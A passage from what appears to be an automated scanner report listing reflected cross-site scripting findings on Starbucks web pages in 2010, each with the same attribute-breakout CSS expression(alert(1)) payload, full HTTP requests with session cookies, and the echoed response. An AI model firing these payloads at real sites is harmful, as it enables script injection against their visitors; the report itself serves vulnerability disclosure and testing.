The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f393"style="x:expression(alert(1))"bf3de1874fc in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network?6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:41:08 GMT
Connection: close
Content-Length: 38665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?6f393"style="x:expression(alert(1))"bf3de1874fc=1"/>
...[SNIP]...

3.42. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d09"style%3d"x%3aexpression(alert(1))"17035a06782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5d09"style="x:expression(alert(1))"17035a06782 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/contact?e5d09"style%3d"x%3aexpression(alert(1))"17035a06782=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:47 GMT
Connection: close
Content-Length: 37097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/contact?e5d09"style="x:expression(alert(1))"17035a06782=1"/>
...[SNIP]...

3.43. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51bc5"style="x:expression(alert(1))"c6d67963f2f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/faqs/card?51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:36:59 GMT
Connection: close
Content-Length: 87713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?51bc5"style="x:expression(alert(1))"c6d67963f2f=1"/>
...[SNIP]...

3.44. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:45 GMT
Connection: close
Content-Length: 37419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/>
...[SNIP]...

3.45. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19c91"style="x:expression(alert(1))"e534a4ef04b in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/faqs/coffeehouse?19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:19 GMT
Connection: close
Content-Length: 58084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?19c91"style="x:expression(alert(1))"e534a4ef04b=1"/>
...[SNIP]...

3.46. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f91e"style="x:expression(alert(1))"2090cf84852 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/faqs/menu?3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:38 GMT
Connection: close
Content-Length: 36961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?3f91e"style="x:expression(alert(1))"2090cf84852=1"/>
...[SNIP]...

3.47. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd41a"style="x:expression(alert(1))"0e8674e1677 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/faqs/responsibility?dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:18 GMT
Connection: close
Content-Length: 37184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?dd41a"style="x:expression(alert(1))"0e8674e1677=1"/>
...[SNIP]...

3.48. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d45"style="x:expression(alert(1))"16e2af548cc in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /customer-service/faqs/shop?16d45"style%3d"x%3aexpression(alert(1))"16e2af548cc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:36:44 GMT
Connection: close
Content-Length: 51551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/shop?16d45"style="x:expression(alert(1))"16e2af548cc=1"/>
...[SNIP]...

3.49. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /menu?12942"style%3d"x%3aexpression(alert(1))"90f8a013063=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:32 GMT
Content-Length: 72476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/>
...[SNIP]...

3.50. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the response excerpt below shows the reflection landing inside the content attribute of the og:url meta tag. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer (and are disabled in IE8 standards mode), so this exact payload may not execute in other browsers. The underlying flaw, an unencoded double quote that terminates the attribute value, is browser-independent; whether other characters such as angle brackets are also left unencoded is not established by this PoC.

Request

GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:14 GMT
Connection: close
Content-Length: 61971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/>
...[SNIP]...

3.51. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:51 GMT
Connection: close
Content-Length: 50806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/>
...[SNIP]...

3.52. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 56860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/>
...[SNIP]...

3.53. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-bliss-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:47 GMT
Connection: close
Content-Length: 41261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/>
...[SNIP]...

3.54. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.

